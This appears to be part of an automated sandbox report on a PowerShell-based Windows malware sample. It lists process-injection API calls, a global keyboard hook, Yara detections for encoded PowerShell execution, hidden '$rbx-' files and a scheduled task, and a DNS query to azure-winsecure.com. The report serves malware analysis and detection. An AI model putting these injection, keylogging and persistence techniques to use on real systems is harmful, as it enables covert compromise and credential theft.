Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Numerics.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.CSharp.pdb@ source: WER643A.tmp.dmp.27.dr
Source:	Binary string: System.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr

Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C2D894 FindFirstFileExW,	18_2_0000022123C2D894
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	18_2_0000022123C2DA18
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C5D894 FindFirstFileExW,	18_2_0000022123C5D894
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	18_2_0000022123C5DA18
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_0000013F08E6DA18
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E6D894 FindFirstFileExW,	19_2_0000013F08E6D894
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_0000013F08E9DA18
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E9D894 FindFirstFileExW,	19_2_0000013F08E9D894
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186DD894 FindFirstFileExW,	36_2_000001FD186DD894
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	36_2_000001FD186DDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DABDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000017C6DABDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DABD894 FindFirstFileExW,	37_2_0000017C6DABD894
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000017C6DD7DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD7D894 FindFirstFileExW,	37_2_0000017C6DD7D894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC64D894 FindFirstFileExW,	38_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC67D894 FindFirstFileExW,	38_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AED894 FindFirstFileExW,	39_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000202C0B1DA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B1D894 FindFirstFileExW,	39_2_00000202C0B1D894
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A66130D894 FindFirstFileExW,	40_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDCD894 FindFirstFileExW,	41_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002BAAEDFDA18
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDFD894 FindFirstFileExW,	41_2_000002BAAEDFD894
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_000002705306DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002705306DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_000002705306D894 FindFirstFileExW,	42_2_000002705306D894

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: azure-winsecure.com

Source: Microsoft-Windows-LiveId%4Operational.evtx.49.dr	String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: powershell.exe, 00000007.00000002.2143087471.000001A697909000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2475973230.000002A7E1F25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000027.00000000.2475625757.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2511424538.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3028177697.00000202C0249000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000027.00000002.3028177697.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475625757.00000202C0200000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F2783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000027.00000000.2475625757.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2511424538.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3028177697.00000202C0249000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000027.00000000.2475625757.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2511424538.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3028177697.00000202C0249000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000032.00000002.3031906020.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000019.00000002.3053661070.0000016A83A50000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.7.dr	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6xGa
Source: powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E3703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.dr	String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B80E0EA NtWriteVirtualMemory,	35_2_00007FFD9B80E0EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B80E112 NtSetContextThread,	35_2_00007FFD9B80E112
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B80E132 NtResumeThread,	35_2_00007FFD9B80E132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B80E0B8 NtUnmapViewOfSection,	35_2_00007FFD9B80E0B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B810FF4 NtResumeThread,	35_2_00007FFD9B810FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B810F30 NtSetContextThread,	35_2_00007FFD9B810F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B810A4E NtUnmapViewOfSection,	35_2_00007FFD9B810A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B80E122 NtSetContextThread,	35_2_00007FFD9B80E122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B810C6D NtWriteVirtualMemory,	35_2_00007FFD9B810C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B80E088 NtUnmapViewOfSection,	35_2_00007FFD9B80E088
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	37_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	38_2_00000225DC642C80
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW,	39_2_00000202C0AE2300
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDF2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	41_2_000002BAAEDF2C80
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_0000027053062300 NtQuerySystemInformation,StrCmpNIW,	42_2_0000027053062300

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\20241003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\20241003\PowerShell_transcript.745481.0eedoBAF.20241003232435.txt
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\$rbx-U7ejKPED

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_qh5es4es.ivl.ps1

Source: C:\Windows\System32\cmd.exe	Code function: 18_3_0000022123BFCC94	18_3_0000022123BFCC94
Source: C:\Windows\System32\cmd.exe	Code function: 18_3_0000022123BF23F0	18_3_0000022123BF23F0
Source: C:\Windows\System32\cmd.exe	Code function: 18_3_0000022123BFCE18	18_3_0000022123BFCE18
Source: C:\Windows\System32\cmd.exe	Code function: 18_3_0000022123BCCC94	18_3_0000022123BCCC94
Source: C:\Windows\System32\cmd.exe	Code function: 18_3_0000022123BC23F0	18_3_0000022123BC23F0
Source: C:\Windows\System32\cmd.exe	Code function: 18_3_0000022123BCCE18	18_3_0000022123BCCE18
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C2D894	18_2_0000022123C2D894
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C22FF0	18_2_0000022123C22FF0
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C2DA18	18_2_0000022123C2DA18
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C5D894	18_2_0000022123C5D894
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C52FF0	18_2_0000022123C52FF0
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C5DA18	18_2_0000022123C5DA18
Source: C:\Windows\System32\conhost.exe	Code function: 19_3_0000013F081CCE18	19_3_0000013F081CCE18
Source: C:\Windows\System32\conhost.exe	Code function: 19_3_0000013F081C23F0	19_3_0000013F081C23F0
Source: C:\Windows\System32\conhost.exe	Code function: 19_3_0000013F081CCC94	19_3_0000013F081CCC94
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E6DA18	19_2_0000013F08E6DA18
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E62FF0	19_2_0000013F08E62FF0
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E6D894	19_2_0000013F08E6D894
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E9DA18	19_2_0000013F08E9DA18
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E92FF0	19_2_0000013F08E92FF0
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E9D894	19_2_0000013F08E9D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B80DD68	35_2_00007FFD9B80DD68
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B80E339	35_2_00007FFD9B80E339
Source: C:\Windows\System32\conhost.exe	Code function: 36_3_000001FD1776CE18	36_3_000001FD1776CE18
Source: C:\Windows\System32\conhost.exe	Code function: 36_3_000001FD1776CC94	36_3_000001FD1776CC94
Source: C:\Windows\System32\conhost.exe	Code function: 36_3_000001FD177623F0	36_3_000001FD177623F0
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186D2FF0	36_2_000001FD186D2FF0
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186DD894	36_2_000001FD186DD894
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186DDA18	36_2_000001FD186DDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_3_0000017C6DA823F0	37_3_0000017C6DA823F0
